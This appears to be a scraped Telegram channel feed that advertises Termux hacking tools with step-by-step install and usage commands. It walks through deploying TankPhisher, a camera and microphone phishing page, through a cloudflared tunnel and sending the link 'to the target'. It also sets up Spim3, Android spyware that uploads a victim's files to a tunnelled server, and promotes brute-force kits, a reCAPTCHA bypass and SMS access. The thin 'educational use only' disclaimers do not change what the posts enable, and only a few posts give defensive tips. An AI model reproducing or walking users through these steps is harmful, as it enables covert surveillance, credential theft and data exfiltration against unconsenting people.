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Kanal geosi va tili
Hindiston, Inglizcha
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- Instagram hack ▶️
- Facebook hack 🗣️
- WhatsApp hack ⚡️
- WiFi Password hack 🔒

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🔖Deleting in 5 Min Join Fast 💻

Lite weight camera and mic phisher for termux.

apt update
apt upgrade
git clone https://github.com/DWIP-BISWAS/TankPhisher
cd TankPhisher
chmod +x ps.sh

Install Cloudflared

Check for latest release in there own repository

pkg install wget
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm
chmod +x cloudflared-linux-arm
mv cloudflared-linux-arm $PREFIX/bin/cloudflared


After running the script, you will receive an HTTP localhost address (e.g.,

cloudflared tunnel --url

Replace with the localhost address you received earlier (e.g.,

Once the Cloudflared tunnel is active, you will receive a permanent URL. Share this link with the target.
⚠️ For more information and use of this tool in termux visit github link of this tool.

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Telegram'da ko‘rish
😂A powerful Python-based tool designed to centralize and streamline brute-forcing tasks. Kraken provides a suite of tools for cybersecurity professionals to efficiently perform brute-force attacks across various protocols and services.

🔗 https://github.com/jasonxtn/Kraken


TankPhisher is a powerful camera and microphone phishing tool designed for educational and testing purposes. This project is currently in development, so there might be some bugs. Stay tuned for future updates!

apt update
apt upgrade
git clone https://github.com/DWIP-BISWAS/TankPhisher

cd TankPhisher

chmod +x ps.sh

Install Cloudflared

Check for latest release in there own repository

pkg install wget
wget https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm
chmod +x cloudflared-linux-arm
mv cloudflared-linux-arm $PREFIX/bin/cloudflared

Run the script


Obtain the Localhost URL

After running the script, you will receive an HTTP localhost address (e.g.,

Set Up the Cloudflared Tunnel

Open a new Termux session and run the following command:

cloudflared tunnel --url

Replace with the localhost address you received earlier (e.g.,

Share the Permanent URL

Once the Cloudflared tunnel is active, you will receive a permanent URL. Share this link with the target.
⚠️ For more information and use of this tool in termux visit github link of this tool.

Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
📱Google Recaptcha Solver

📱A Python script to solve Google reCAPTCHA using the DrissionPage library

🖥 https://github.com/sarperavci/GoogleRecaptchaBypass


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
💬Access Phone's SMS Remotely🖋


✋✍Are your Windows systems vulnerable to brute-force attacks?

🔒 Attackers commonly try to guess passwords, especially for local admin accounts. Good news! You can now use Group Policies to lock out these accounts after too many failed attempts. This raises the bar for attackers!

⬇️📌Here's how to boost your Windows PC security against brute-force attacks using Group Policies:

1️⃣ Enable Account Lockout Policies via Group Policy Editor gpedit.msc
2️⃣ Set an "Account lockout threshold" for invalid login attempts
3️⃣ Define an "Account lockout duration" in minutes
4️⃣ Configure "Reset account lockout counter after" a set time

🔕This simple technique can drastically improve your security posture by preventing attackers from endlessly trying passwords.


X-snifer is a versatile tool designed for scanning and gathering information from a website and simplifying various website analysis and network reconnaissance tasks.

$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/X-snifer.git
$ cd X-snifer
$ pip install -r requirements.txt
$ python3 X-snifer.py
first: Install tools according to the instructions above.
second: Select one of the tools you want to use according to the numbers.
third: Follow the directions from the tool you have chosen and enter according to the directions.
last: The tool will automatically perform a scanner.

⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


All Tools For Hacking Activity! List:~ Exploiter, Checker, Webshell Finder, Grabber, Searching, Bruteforce, Random, And Others Tools

pkg update && pkg upgrade
pkg install git
pkg install python
pip install termcolor
pip install pytube
pip install requests_oauthlib

git clone https://github.com/DarkSkull777/DarkCool.git

cd DarkCool

python setup_darkcool.py

python darkcool.py
Once DarkCool is installed, you can start using it with the following common commands:

python setup_darkcool.py: Install pip.
darkcool.py: Run the DarkCool program.

⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


4.7k 0 58 14 16

📱 20 FREE Softwares/Tools For Cybersecurity Professionals/Enthusiasts

🔴1. Kali Linux - Operating System
📌2. Wireshark - Network Protocol Analyzer
🔴3. Nmap - Port Scan
➡️4. Burp Suite - Web Hacking
➡️5. Gophish - Open Source Phishing Toolkit
➡️6. Aircrack-ng - Wi-Fi Security
➡️7. Have I Been Pwned - Email Security
➡️8. Metasploit Framework - PenTesting Tool
🔴9. Nikto - Vulnerability Scanner
➡️10. HackTheBox - Training
🔴11. PfSense - Firewall/Router
➡️12. Cyber Chef - Data Modification
🔴13. Snort - Intrusion Detection System
➡️14. Ghidra - Debugging
🔴15. Deshashed - Email Security
➡️16. OpenVAS - Vulnerability Scanner
➡️17. OSSEC - Intrusion Detection and Prevention
🔴18. Sqlmap - Detect and Exploit SQL Injection
➡️19. REMnux - Reverse Engineering and Malware Analysis
🔴20. Zed Attack Proxy - Web App Security Scanner


🔴RedTiger-Tools is a free multi-tool with many features in the areas of Cybersecurity, Pentesting, OSINT, Network Scanning, Discord and Hacking.

🔗 https://github.com/loxy0dev/RedTiger-Tools


How to install Truecaller in Termux

pkg update
pkg upgrade
apt install nodejs-lts -y
npm install -g truecallerjs -y
truecallerjs login
Step 1: First of all we have to login in the truecaller js through truecallerjs login Command.
Step 2: Type the number using international format ( for india use +91 in front of your phone number.

Step 3: Now enter the OTP that has been sent to your phone number that you have typed.

Step 4: To search a phone number in termux just type truecallerjs -s {phonenumber}. (Replace {phonenumber} With the number you want to search shown in the phone number)

⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


XTempmail is a place where you can create or check unlimited temporary emails and they will automatically check the inbox.

$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/XTempmail.git
$ cd XTempmail
$ bash install.sh
$ python XTempmail.py
first: Install tools according to the instructions above
second: Copy the email that appears on the screen
third: Just send a message to the email you have copied or registered anywhere to receive the OTP
last: The tool will automatically receive incoming messages to XTempmail

⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


🧑‍💻Linux file permissions overview

Xscanweb is a simple tool for scanning a website,This tool is designed to assist security administrators and developers in auditing website security effortlessly.

$ pkg update -y && pkg upgrade -y
$ apt update -y && apt upgrade -y
$ pkg install git
$ pkg install python -y
$ git clone https://github.com/Whomrx666/Xscanweb.git
$ cd Xscanweb
$ bash install.sh
$ make run
first: Install tools according to the instructions above
second: Enter the URL of a website you want to scan.
last: Click enter and the tool will automatically scan the website and show the results

⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


💻Resources to Learn Ethical Hacking

📖Books – Start with The Basics of Hacking and Penetration Testing by Patrick Engebretson.

🎥 YouTube Channels – Follow channels like HackerSploit and The Cyber Mentor for tutorials and tips.

🖥 Online Courses – Platforms like Udemy and Coursera offer courses on ethical hacking by experts.

🌐 Websites – Explore platforms like Hack The Box and OverTheWire for hands-on hacking challenges.

📰 Blogs – Read blogs like HackRead and Null Byte for news, tutorials, and cybersecurity updates.

💻 Capture The Flag (CTF) – Participate in CTF competitions on platforms like Hack The Box and TryHackMe.

🔓 Forums – Join communities like Reddit’s r/HowToHack and Stack Overflow for discussions and advice.

⚙️ Tools Documentation – Study the documentation of tools like Metasploit, Nmap, and Wireshark for in-depth understanding.

🎥 Webinars – Attend cybersecurity webinars hosted by professionals and organizations for insights and tips.

🔑 Certifications – Consider certifications like CEH (Certified Ethical Hacker) and OSCP (Offensive Security Certified Professional) for formal recognition.

🎙 Podcasts – Listen to cybersecurity podcasts like Darknet Diaries and Security Now for real-life hacking stories and discussions.

📖 Whitepapers – Read cybersecurity whitepapers released by firms and researchers for in-depth analysis.

🕹 Gaming – Play hacking simulation games like Hacknet and Uplink to practice hacking techniques.

💼 Networking – Connect with aspiring ethical hackers through social media and online forums.

💬 Open Source Projects – Contribute to cybersecurity projects on platforms like GitHub.


Video oldindan ko‘rish uchun mavjud emas
Telegram'da ko‘rish
📁 How to crack pdf file 📷


6.2k 0 115 4 23

Protect Your Termux Terminal By Password

Lock Termux

apt update
apt upgrade
apt install python2
apt install bash
apt install git
git clone https://github.com/sync-ankit/Lock-Termux
cd Lock-Termux
bash setup.sh
set you password
⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


➡️📷How Do I Protect My Computer From Bots?🛡

🤖It’s Very Possible To Protect Your Computer From Bots, But it Takes Diligence And Knowing What To Look For. Use The Following Tips To Keep Your Computer Safe: ⬇️

🔇Install Firewalls To Block Malicious Attacks And Never Turn Them Off.

👾🔇Use A Long And Complicated Password That Contains Numbers And Symbols.

🔇Never Use The Same Password For Multiple Programs.

⚪️🔇Install Quality Anti-Malware Software Such As Norton security to protect your device.

🥸🔇Ensure Software Is Up To Date, And Never Ignore System Updates.

⚪️🔇Refrain From Using Flash Drives, Or Thumb Drives, In An Infected Computer.


Simple Android spyware that uploads all files from user selected paths.

pkg update && pkg upgrade -y
pkg install git pv unzip -y
git clone http://github.com/7wp81x/Spim3
cd Spim3/
bash spim3.sh

Example usage:

- open new session
cd Files/
php -S > /dev/null 2>&1 &

- Tunnel using cloudflared
cloudflared tunnel --url

- Tunnel using ngrok
ngrok http 8080

- on main session:

bash spim3.sh

- Enter the url from ngrok/cloudflare.
- Enter paths, if done then Enter done.
- Compile /sdcard/Spim3/decompiled Using apktool_M
⚠️Termux tools are for educational use only. For more information about this tool, visit the GitHub link.


20 ta oxirgi post ko‘rsatilgan.